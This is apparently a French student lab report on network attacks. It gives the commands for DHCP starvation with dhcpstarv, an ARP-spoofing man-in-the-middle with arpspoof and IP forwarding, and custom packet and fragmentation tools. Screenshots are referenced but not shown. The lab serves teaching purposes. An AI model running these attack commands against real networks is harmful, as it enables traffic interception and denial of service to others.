tp2-cs

Implémentation d’attaques

my_ping.c

générer un paquet IP echo

#cc -c my_ping.c  pour compiler
#cc my_ping.c –o myping  pour générer l’exécutable
#./myping 192.168.1.1 192.168.1.2 500

on utilise WireShark pour observer le résultat Capture d’écran 2021-12-15 171321

pingsur2frag.c

faire un ping avec une taille de 2000 octets sur le lien ethernet

#cc -c pingfragments.c  pour compiler
#cc pingfragments.c –o pf  pour générer l’exécutable
#./pf 192.168.1.1 192.168.1.2 2000

on utilise WireShark pour observer les différents champs des fragments IP

Capture d’écran 2021-12-15 223506

pingfragments.c

compiler et générer l’exécutable

#cc -c pingsur2frag.c  pour compiler
#cc pingsur2frag.c –o psf  pour générer l’exécutable
#./psf 192.168.1.1 192.168.1.2 2000

observer le resultat

Capture d’écran 2021-12-15 223124

demandeconntcp.c

compiler et générer l’exécutable

#cc -c demandeconntcp.c  pour compiler
#cc demandeconntcp.c –o dct  pour générer l’exécutable
#./dct 192.168.1.1 192.168.1.2 2000

resultat :

Capture d’écran 2021-12-15 224322

Test de quelques outils d’attaques2

DHCP starvation

L’attaquant inonde le serveur DHCP avec des messages DHCPREQUEST afin de réserver toutes les adresses IP disponibles sur le serveur DHCP. L’attaquant doit utiliser une nouvelle adresse MAC pour chaque requête

Manipulation :

#tar –xvf dhcpstarv-0.2.1.tar.gz

Capture d’écran 2021-12-20 143228 (2)

#cd dhcpstarv-0.2.1
#./configure

Capture d’écran 2021-12-30 131121

#make

Capture d’écran 2022-01-09 134601

#make install 

Capture d’écran 2022-01-09 134631

Sur une autre machine, on a configurer le serveur DHCP _ configuration du dhcp _

Capture d’écran 2022-01-09 135330 on lance l attaque

#sudo dhcpstarv -i eth0

WhatsApp Image 2022-01-09 at 1 34 42 PM on observe sur WireShark l'envoie des demandes dhcp (dhcp discover)

Capture d’écran 2022-01-09 135533

l'assignment des adresses ip

Capture d’écran 2022-01-09 135433

Attaque “Man In The Middle” basée sur l'attaque “ARP spoofing”

Pour réaliser cette attaque, nous avons besoin de trois nœuds connectés à un switch (cas réel ou sur GNS3) ou à un point d'accès sans fil. Le nœud attaquant sera la machine sur laquelle est installé le système d'exploitation « Kali Linux »

les tables arp avant l'attaque WhatsApp Image 2022-01-09 at 1 34 41 PM (1)

Etape 1 : activer le routage dans le nœud attaquant (Kali Linux)

Tester si le routage est activé en utilisant la commande sysctl ou en cherchant la valeur de ip_forward dans /proc/sys/ipv4

Root# sysctl net.ipv4.ip_forward
net.ipv4.ip_forward = 0

Activer le routage :

root# sysctl -w net.ipv4.ip_forward=1

WhatsApp Image 2022-01-09 at 1 34 40 PM

Etape 2 : empoisonner les tables ARP des nœuds victimes

Lancer une communication entre les deux nœuds légtimes (exemple : ping) puis afficher le contenu de leur table arp (arp -a). Exécuter, ensuite, l'attaque arpspoof.

root#arpspoof -i eth0 -t 192.168.1.3 192.168.1.4
root#arpspoof -i eth0 -t 192.168.1.4 192.168.1.3

WhatsApp Image 2022-01-09 at 1 34 39 PM on utilise Wireshark pour afficher le trafic capturé par l'attaquant

root#wireshark

WhatsApp Image 2022-01-09 at 1 34 41 PM les tables arp apres l'attaque

WhatsApp Image 2022-01-09 at 1 34 41 PM (2)

Attaque “usurpation d’identité”

Dans cette partie, nous utiliserons l'outil « cat Karat packet Builder » : Tout d'abord, on choisit l'interface qu'on veut attaquer, puis on choisit le protocole et la taille des paquets : Capture d’écran 2022-01-10 000202

manip 1:

Maintenant, nous envoyons une requête Arp : Nous devons déterminer l'adresse IP et l'adresse Mac de la source et de la destination Capture d’écran 2022-01-10 000202 Nous suivons le trafic en utilisant le wireshark : Capture d’écran 2022-01-10 000221 manip 2: Nous devons déterminer l'adresse IP et l'adresse Mac de la source et de la destination Capture d’écran 2022-01-10 000202 Capture d’écran 2022-01-10 000221

Attaque “ARP cache poisoning”

Capture d’écran 2022-01-10 000249 Capture d’écran 2022-01-10 000339 Capture d’écran 2022-01-10 000357 Capture d’écran 2022-01-10 000420 Capture d’écran 2022-01-10 000440 Capture d’écran 2022-01-10 000504 Capture d’écran 2022-01-10 000521 Capture d’écran 2022-01-10 000539 Capture d’écran 2022-01-10 000609

Ettercap

WhatsApp Image 2022-01-09 at 1 34 37 PM WhatsApp Image 2022-01-09 at 1 34 37 PM (1)

WhatsApp Image 2022-01-09 at 1 34 38 PM WhatsApp Image 2022-01-09 at 1 34 38 PM (1)

THEEND